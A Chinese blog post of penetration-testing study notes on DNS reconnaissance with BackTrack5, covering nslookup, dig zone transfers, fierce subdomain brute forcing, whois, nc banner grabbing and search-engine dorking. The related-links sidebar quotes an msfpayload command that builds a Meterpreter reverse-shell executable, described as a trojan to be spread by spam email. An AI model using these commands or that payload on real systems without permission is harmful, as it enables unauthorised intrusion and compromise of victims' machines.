BackTrack5 学习笔记3 DNS 侦查

最新推荐文章于 2022-04-22 09:25:27 发布
最新推荐文章于 2022-04-22 09:25:27 发布
阅读量686 收藏
点赞数
分类专栏: # 网络安全 文章标签: dns服务器 dns 服务器 域名 server
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xundh/article/details/77113332
版权

本系列文章来自《高度安全环境下的高级渗透测试》一书学习笔记。

一、nslookup

nslookup是一个DNS查询工具,它可以将IP解析成域名,或域名解析成IP。
最简单命令

nslookup example.com

这里写图片描述
Server是DNS地址。#53是UDP端口号。

更换DNS服务器
这里写图片描述
简化命令:

nslookup -type=ns example.ocm 8.8.8.8

set type=ns 是将类型定义为ns(域名服务器)

自动化脚本
可以使用nano创建自动化脚本。

二、域名信息搜索器(Dig)

类似nslookup的工具,不仅通过命令行运行,还支持在查询多个域名时,将文件通过管道直接导入。Dig使用/etc/resolve.conf文件来迭代域名服务器,除非指定了一个域名服务器。Dig有一个很长的选项列表,可以配置获取自己想要搜集的数据。

1. 默认输出

dig example.com

这里写图片描述

程序输出项有:

  • Dig版本号
  • 默认选择全局option
  • example.com的A记录
  • 运行时间

2.使用Dig进行域传送

dig @ns1.example.com example.com axfr

三、DNS暴力破解

cd /pentest/enumeration/dns/fierce
./fierce.pl -dns example.com

如果开启了transfer,则会直接通过域传送或取服务器上的所有域名信息。

如果要使用自定义字典,可以在myWordList.txt输入猜测字典,然后使用命令:

./fierce.pl -dns example.com -wordlist myWordList.txt

四、 whois

whois example.com

指定使用哪个注册机构

whois -h whois.apnic.net 192.0.43.10

该 IP 所属国家

whois -h whois.arin.net 192.0.43.10 | grep Country:

Shodan

主要针对80端口中发现的信息进行索引,同时也检索Telnet、SSH、FTP。
这是在线应用,网址:
http://www.shodanhq.com

nc

nc example.com 80

查看HTTP旗标

google hacking database

http://exploit-db.com/google-dorks

Metagoofil

http://www.edge-security.com
自动在搜索引擎中检索和分析文件。

Exiftool

针对多种文件格式来获取Exif数据。
Foca是带有用户界面的软件,运行在windows下。

编程圈子
关注
专栏目录
backtrack-回溯搜索算法总结
weixin_43826475的博客
12-14 620
backtrack——回溯算法总结 这几天着重在刷LeetCode有关回溯搜索算法的题,之前也写了一些博客,感觉当时清楚,但是原理上还是有点模糊。之前根据别人的模板,依葫芦画瓢,解决了一些问题,但是有的时候条件变了,就有点理不清楚了,特别是哪里该加一些限制条件,很懵逼。所以总结了一下。 1. 到底什么是回溯? 回溯算法,都知道是基于递归的算法。那为什么要用递归呢,可以用传统的写法代替嘛?之所以用递归,就是因为如果用传统的方式,很难写或者根本写不出来。举个例子,比如我们想知道用集合nums = [1, 2,
BackTrack5 学习笔记
tingyuanss的专栏
07-17 3588
离线攻击MSF 1.        制造离线攻击脚本 先创建一个反向连接TCP客户端(相当于木马),然后把这个.exe文件通过垃圾邮件发送给别人。/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.167 LPORT=33333 X > /tmp/newgames
BT5稳定更新源(实测有效)
01-18
BT5稳定更新源(实测有效)BT5稳定更新源(实测有效)
渗透测试DNS收集-DIG
分享学习网络的点点滴滴
04-22 524
DNS收集是渗透测试信息收集必备的步骤
Back Track5学习笔记
weixin_34414650的博客
05-30 408
1.BT5默认用户名:root.密码:toor(公司是yeslabccies) 2.进入图形化界面命令:startx 3.更改密码:sudo passwd root 扫描工具 第一部分网络配置: 4.网络配置文件有两个: /etc/network/interfaces和/etc/resolv.conf 前一个存放网卡接口、IP、子网掩码等,后一个主要是存放DNS。 5.查看IP...
BackTrack渗透测试学习笔记
02-10
标题《BackTrack渗透测试学习笔记》指明了文档的主要内容,它是关于BackTrack操作系统在渗透测试领域的应用以及学习经验的集合。BackTrack是一个专门设计用于网络安全评估和渗透测试的Linux发行版。它包含了大量的...
Backtrack渗透测试学习笔记.rar
06-14
关于讲解 backtrack 的入侵与渗透的中文资料,文中从信息收集,身份识别,社会工程学攻击,metasploit 运用层攻击,局域网攻击,维持访问等几个方面对 Back|Track 做一个介绍
backtrack5r3
11-16
记录了一下自己backtrack5r3的安装的流程,方便使用记忆,方便以后安装
小沐BackTrack学习笔记
04-30
小沐BackTrack学习笔记,个人在Linux环境下的实验命令
python出错时traceback的解读
aolu7076的博客
09-18 1186
写 Python 代码的时候,当代码中出现错误,会在输出的时候打印 Traceback 错误信息,很多初学者看到那一堆错误信息,往往都会处于懵逼状态,脑中总会冒出一句,这都是些啥玩意。如果你是第一次看到它,也许你不知道它在告诉你什么。虽然 Python 的 Traceback 提示信息看着挺复杂,但是里面丰富的信息,可以帮助你诊断和修复代码中引发异常的原因,以及定位到具体哪个文件的哪...
DNS笔记(二)
qq_39063722的博客
07-29 157
区域传输 1. dig @ns1.example(sina).com example(sina).com axfr axfr (Request for full zone transfer) 2. host -T -l sina.com 8.8.8.8 -T(enables TCP/IP mode) -l(lists all hosts in a domain , using AXFR) D...
BackTrack5 升级Metasploit至Git更新的方法
骑蜗牛散步的专栏
11-25 1945
参考文章: http://www.myhack58.com/Article/48/67/2013/38741.htm http://blog.chinaunix.net/uid-13344516-id-3597709.html (感谢原作者) 1、gedit /etc/apt/source.list 添加部分源: deb http://mirrors.163.com/ubuntu/
BackTrack5 学习笔记4 WEB 应用指纹
编程圈子-谢厂节的博客
08-14 733
一、 概念每个应用都可能存在一些特殊的标记,通过这些标记可以推断出网站的一些技术架构。这些标记可以称之为WEB指纹。浏览器指纹 Electronic Frontier Foundation 研究出来的技术,可以匿名识别WEB浏览器,准确率高达94%。通过查询浏览器的代理字符串,屏幕色深,语言,插件安装与支持的 MIME 类型,时区偏移量和其他功能,如本地存储和会话存储等等,然后这些值通过散列函数
明景移动式视频快速查找系统
视频侦查
04-10 624
明景移动式视频快速查找系统——北京明景科技 明景移动式视频快速查找系统基于深度学习、人工智能等前沿科技,结合社会监控资源现状和实际的办案场景,提供强大视频侦查功能。产品具有公安部安全与警用电子产品质量检测中心出具的权威检验报告,是业界少...
提供可用的BT5更新源,亲测可用
WEL测试
09-07 4942
现在已经从BT5到kali了,原来的BT5的软件源有些已经跟不上了。所以应该修改BT5下的软件源:/etc/apt/sources.list kali国内源的地址: deb http://ftp.sjtu.edu.cn/debian wheezy main non-free contrib deb-src http://ftp.sjtu.edu.cn/debian wheezy main no
BackTrack5 ubuntu10.4(lucid)更新源以及404问题解决步骤
WEL测试
09-08 2110
本机系统信息: ubuntu提供了old-release的方案,通过命令行更新源如下: kwrite gedit /etc/apt/sources.list,打开源列表文件,把里面的地址全删除,然后换上如下的地址,如果是其他版本的,把lucid替换即可: deb http://old-releases.ubuntu.com/ubuntu lucid main restricted u
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

编程圈子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值